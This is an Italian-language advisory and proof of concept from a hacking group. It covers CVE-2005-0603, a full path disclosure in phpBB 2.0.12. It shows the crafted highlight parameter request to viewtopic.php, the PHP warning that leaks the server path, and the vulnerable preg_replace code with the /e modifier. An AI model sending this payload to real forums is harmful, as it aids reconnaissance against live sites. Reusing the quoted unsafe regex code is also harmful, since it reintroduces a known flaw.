
Exploit proof-of-concept per CVE-2005-0603, che dimostra una vulnerabilità di divulgazione del percorso completo in phpBB 2.0.12 tramite un regex realizzato ad hoc nel parametro highlight di viewtopic.php.
Programma: phpBB 2.0.12 Homepage: http://www.phpbb.com Versioni vulnerabili: phpBB 2.0.12 e versioni precedenti Rischio: Basso rischio!! Impatto: Divulgazione del percorso completo
-==phpBB 2.0.12 Divulgazione del percorso completo==-
phpBB è un pacchetto per forum open source potente, completamente scalabile e altamente personalizzabile. phpBB ha un'interfaccia intuitiva, un pannello di amministrazione semplice e diretto, e una FAQ utile. Basato sul potente linguaggio server PHP e sulla scelta di database MySQL, MS-SQL, PostgreSQL o Access/ODBC, phpBB è la soluzione comunitaria gratuita ideale per tutti i siti web.
localhost e molti forum
phpBB/viewtopic.php?p=6&highlight=[HaCkZaTaN]
Verrà fuori qualcosa del genere.
Warning: Compilation failed: missing terminating ] for character class at offset 20 in /home/nst/forum/viewtopic.php(1110) : regexp code on line 1
Darà una divulgazione del percorso completo e anche una cosa che ho notato è che i post cambiano, non viene fuori nulla. Nella variabile HighLight
Ecco il problema: -----[ Start Vuln Code ] ------------------------------------
1106: if ($highlight_match)
1107: {
1108: // This was shamelessly 'borrowed' from volker at multiartstudio dot de
1109: // via php.net's annotated manual
1110: $message = str_replace('"', '"',
substr(preg_replace('#(>(((?>([^><]+|(?R)))*)<))#se', "preg_replace('#\b(" .
$highlight_match . ")\b#i', '<span style="color:#" . $theme['fontcolor3'] .
"">\\1', '\0')", '>' . $message . '<'), 1, -1)); 1111: }
-----[ Ends Vulns Code ] ------------------------------------ Non prendere in prestito roba lol.
Non ancora xD
Non ancora xD
OK un'altra cosa che ho notato era in php.ini
magic_quotes_gpc = On magic_quotes_sybase = Off
è necessario attivarli entrambi su ON
Scoperto da HaCkZaTaN [email protected]
[N]eo [S]ecurity [T]eam [NST]® - http://neossecurity.net/
Hai domande? http://neossecurity.net/
Irc.InfoGroup.cl #neosecurityteam
Paisterist
T0wn3r
Heap
Nitrous
CrashCool
eL_mEsIaS
Makoki
E la mia gente colombiana